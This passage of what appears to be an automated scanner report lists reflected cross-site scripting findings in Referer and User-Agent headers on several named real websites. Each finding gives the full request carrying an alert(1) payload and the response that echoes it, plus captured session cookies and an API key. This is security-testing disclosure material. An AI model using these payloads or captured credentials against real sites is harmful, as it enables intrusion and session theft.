<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=319&size=300x250&inv_code=601669&referrer=http://www.google.com/search%3Fhl=en%26q=11978'-alert(1)-'712c5dc792d&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D319%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D300x250%26section%3D601669">
...[SNIP]...

4.561. http://api.bizographics.com/v1/profile.json [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.json

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload c87df<script>alert(1)</script>93af6c2ba17 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /v1/profile.json?api_key=6332f8b7316a4d1284e9c1217a367347&callback=Demdex.parseBizo HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: c87df<script>alert(1)</script>93af6c2ba17
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KbEYt9Gm0axhaj5XcunNcMDa7Re6IGD4lDrbCisip76D66Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRXq0x1X4kUBB3CBHNXcl3bEVUJBxdqAyDalXCEoKjwKKB7uI3cisSEIeS2mCWkomhIipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 02 Feb 2011 15:30:05 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 58
Connection: keep-alive

Unknown Referer: c87df<script>alert(1)</script>93af6c2ba17

4.562. https://api.bizographics.com/v1/profile.json [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://api.bizographics.com
Path:	/v1/profile.json

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload efdaf<script>alert(1)</script>44c02aedbc6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /v1/profile.json?api_key=6332f8b7316a4d1284e9c1217a367347&callback=Demdex.parseBizo HTTP/1.1
Host: api.bizographics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KRShFj6bKbiijaj5XcunNcMDa7Re6IGD4lLFCw41jWbyOAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtT8sOM0TiiisRAyMfy5dfAVhDEVUJBxdqAyAsVh4uYPLmIgwbisDgBSipgnUuNumFpPoipAipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;
Referer: efdaf<script>alert(1)</script>44c02aedbc6

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 02 Feb 2011 16:18:36 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 58
Connection: Close

Unknown Referer: efdaf<script>alert(1)</script>44c02aedbc6

4.563. https://gc.synxis.com/XBE/Popups/InfoPopup.aspx [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://gc.synxis.com
Path:	/XBE/Popups/InfoPopup.aspx

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload a5b3f--><script>alert(1)</script>e7875b8ff69 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /XBE/Popups/InfoPopup.aspx?hotel=11536&hotelgroup=5303&lang=1&view=28&shell=9adc412feca446b4bdccea9aa721a765&template=1e8778f11833464cb60925c02a37f3dd&room=ST1K&media=2666f74ea41c4e9db3ec8835549ad2a4&TB_iframe=true&width=400&height=400&modal=false HTTP/1.1
Host: gc.synxis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a5b3f--><script>alert(1)</script>e7875b8ff69
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=jtlir345s4fdq0eiwrrnxp45; mbox=check#true#1296574114|session#1296573995979-796819#1296575914;

Response

4.564. https://gc.synxis.com/XBE/Popups/InfoPopup.aspx [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://gc.synxis.com
Path:	/XBE/Popups/InfoPopup.aspx

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 9223a<a>b8515daf8ba was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /XBE/Popups/InfoPopup.aspx HTTP/1.1
Host: gc.synxis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)9223a<a>b8515daf8ba
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=jtlir345s4fdq0eiwrrnxp45; mbox=check#true#1296574114|session#1296573995979-796819#1296575914;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 174
Vary: Accept-Encoding
Date: Tue, 01 Feb 2011 15:35:41 GMT
Connection: close

4.565. https://gc.synxis.com/rez.aspx [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://gc.synxis.com
Path:	/rez.aspx

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload 2736c--><script>alert(1)</script>d72e32cd699 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /rez.aspx?&Chain=5303&start=16& HTTP/1.1
Host: gc.synxis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)2736c--><script>alert(1)</script>d72e32cd699
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=jtlir345s4fdq0eiwrrnxp45; mbox=check#true#1296574114|session#1296573995979-796819#1296575914;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Tue, 01 Feb 2011 15:35:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 62635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
...[SNIP]...
<script>alert(1)</script>d72e32cd699" -->

4.566. https://gc.synxis.com/xbe/rez.aspx [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://gc.synxis.com
Path:	/xbe/rez.aspx

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload a2727--><script>alert(1)</script>35328277103 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /xbe/rez.aspx?Chain=5303&start=1&hotel=11536&arrive=02%2F01%2F2011&nights=1&adult=1&child=0&rooms=1&group=&promo=ushoyt&iata=&step=2&mboxSession=1296573995979-796819 HTTP/1.1
Host: gc.synxis.com
Connection: keep-alive
Referer: http://www.millenniumhotels.com/millenniumboston/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10a2727--><script>alert(1)</script>35328277103
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

4.567. http://medienfreunde.com/lab/innerfade/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://medienfreunde.com
Path:	/lab/innerfade/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2932"><script>alert(1)</script>4fce17b3452 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /lab/innerfade/ HTTP/1.1
Host: medienfreunde.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: b2932"><script>alert(1)</script>4fce17b3452

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:32:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 14717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">

<hea
...[SNIP]...
<iframe src="http://pingomatic.com/ping/?title=Flyer&blogurl=b2932"><script>alert(1)</script>4fce17b3452&rssurl=&chk_weblogscom=on&chk_blogs=on&chk_technorati=on&chk_feedburner=on&chk_syndic8=on&chk_newsgator=on&chk_feedster=on&chk_myyahoo=on&chk_pubsubcom=on&chk_blogdigger=on&chk_blogstreet=on&chk_moreo
...[SNIP]...

4.568. http://solutions.liveperson.com/ref/lppb.asp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://solutions.liveperson.com
Path:	/ref/lppb.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40b07'-alert(1)-'d5a8a9aeffc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ref/lppb.asp HTTP/1.1
Host: solutions.liveperson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=40b07'-alert(1)-'d5a8a9aeffc

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:41:27 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 3686
Content-Type: text/html
Set-Cookie: visitor=ref=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3D40b07%27%2Dalert%281%29%2D%27d5a8a9aeffc; expires=Tue, 10-Jan-2012 05:00:00 GMT; domain=.liveperson.com; path=/
Set-Cookie: ASPSESSIONIDQSDTDCQS=MHEFFOICFMALHBAGDLCEHAGC; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<TITLE>Customer Service Solutions - LivePerson</title>
<META NAME="descripti
...[SNIP]...
<script language='javascript'>
lpAddVars('visitor','Visitor+Referrer','http://www.google.com/search?hl=en&q=40b07'-alert(1)-'d5a8a9aeffc');
lpAddVars('page','pageName','');
</script>
...[SNIP]...

4.569. http://updates.orbitz.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://updates.orbitz.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2a26"><script>alert(1)</script>4e16ea664ee was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: updates.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e2a26"><script>alert(1)</script>4e16ea664ee

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Wed, 02 Feb 2011 15:42:41 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Set-Cookie: traveler_update_visitor=B704221B7BC5130; path=/; expires=Tue, 02 Feb 2016 15:42:40 GMT
Set-Cookie: traveler_update_session=BAh7CToOcmV0dXJuX3RvIgYvOhFsYXN0X3JlcXVlc3RABjoQbGFzdF92aWV3%250AZWRABiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7AA%253D%253D--1848cb98c769e595ff92d0c71ba7b529ea2e7b8c; path=/
Status: 200 OK
X-Runtime: 0.05162
ETag: "e3805ab73252db7f49504ae9518d880e"
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 32775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<meta htt
...[SNIP]...
cs.com/__utm.gif?utmwv=3&utmn=182404415&utme=&utmcs=-&utmsr=-&utmsc=-&utmul=-&utmje=-&utmfl=-&utmcn=1&utmdt=Main page&utmhn=updates.orbitz.com&utmhid=87738019&utmr=http://www.google.com/search?hl=en&q=e2a26"><script>alert(1)</script>4e16ea664ee&utmp=/&utmac=UA-2050648-1&utmcc=__utma%3D171367140.1704221751.1033129352.1033129352.1033129352.1%3B%2B__utmz%3D171367140.1704221751.1.1.utmcsr%3Dwww.google.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferra
...[SNIP]...

4.570. http://updates.orbitz.com/flight_status [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://updates.orbitz.com
Path:	/flight_status

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c422"><script>alert(1)</script>79e384fb3bc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /flight_status HTTP/1.1
Host: updates.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=6c422"><script>alert(1)</script>79e384fb3bc

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Wed, 02 Feb 2011 15:42:42 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Set-Cookie: traveler_update_visitor=ED7A2C9950CD932; path=/; expires=Tue, 02 Feb 2016 15:42:42 GMT
Set-Cookie: traveler_update_session=BAh7CToOcmV0dXJuX3RvIhMvZmxpZ2h0X3N0YXR1czoRbGFzdF9yZXF1ZXN0%250AQAY6EGxhc3Rfdmlld2VkQAYiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6%250AOkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%253D--2e47e384fcf267e3ac43c1147866adf06a386ff2; path=/
Status: 200 OK
X-Runtime: 0.01426
ETag: "50fd0e0e1c4599312e9b792d296674b6"
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 20517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<meta htt
...[SNIP]...
om/__utm.gif?utmwv=3&utmn=458814746&utme=&utmcs=-&utmsr=-&utmsc=-&utmul=-&utmje=-&utmfl=-&utmcn=1&utmdt=Flight+status&utmhn=updates.orbitz.com&utmhid=87738019&utmr=http://www.google.com/search?hl=en&q=6c422"><script>alert(1)</script>79e384fb3bc&utmp=/flight_status&utmac=UA-2050648-1&utmcc=__utma%3D171367140.1729950932.1509727584.1509727584.1509727584.1%3B%2B__utmz%3D171367140.1729950932.1.1.utmcsr%3Dwww.google.com%7Cutmccn%3D(referral)%7Cutm
...[SNIP]...

4.571. http://www.addthis.com/bookmark.php [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc7c2"><script>alert(1)</script>4d661957df4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=cc7c2"><script>alert(1)</script>4d661957df4

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:38:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 94428

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=cc7c2"><script>alert(1)</script>4d661957df4" />
...[SNIP]...

4.572. http://www.addthis.com/bookmark.php [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 353f3<script>alert(1)</script>db380bfc2e6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:38:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 94414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<h4>353f3<script>alert(1)</script>db380bfc2e6 - Google search</h4>
...[SNIP]...

4.573. http://www.ehow.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4484</script><script>alert(1)</script>1cc7f90f443 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: www.ehow.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=f4484</script><script>alert(1)</script>1cc7f90f443

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Wed, 02 Feb 2011 15:11:54 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=zmy4va550bb3oevpby2lw345; path=/; HttpOnly
Set-Cookie: google-autocomplete=autocomplete; domain=.ehow.com; expires=Wed, 09-Feb-2011 15:11:54 GMT; path=/
Set-Cookie: oml=www.google.com; path=/
Set-Cookie: oms=homepage; path=/
Vary: Accept-Encoding
Content-Length: 72506

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>eHow | How To Do Just About Everything! | How To
...[SNIP]...
obj){
               vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560');
               if (window.focus){ vWin.focus() }
               return false;
           }

        g_googleReferrerSearchTerm = "f4484</script><script>alert(1)</script>1cc7f90f443";

       </script>
...[SNIP]...

4.574. http://www.ehow.com/MailingList.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/MailingList.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20a6f</script><script>alert(1)</script>bf656815b44 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /MailingList.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=20a6f</script><script>alert(1)</script>bf656815b44

Response

4.575. http://www.ehow.com/about_us/about_us.aspx [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/about_us/about_us.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94767</script><script>alert(1)</script>72faf05749a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /about_us/about_us.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=94767</script><script>alert(1)</script>72faf05749a

Response

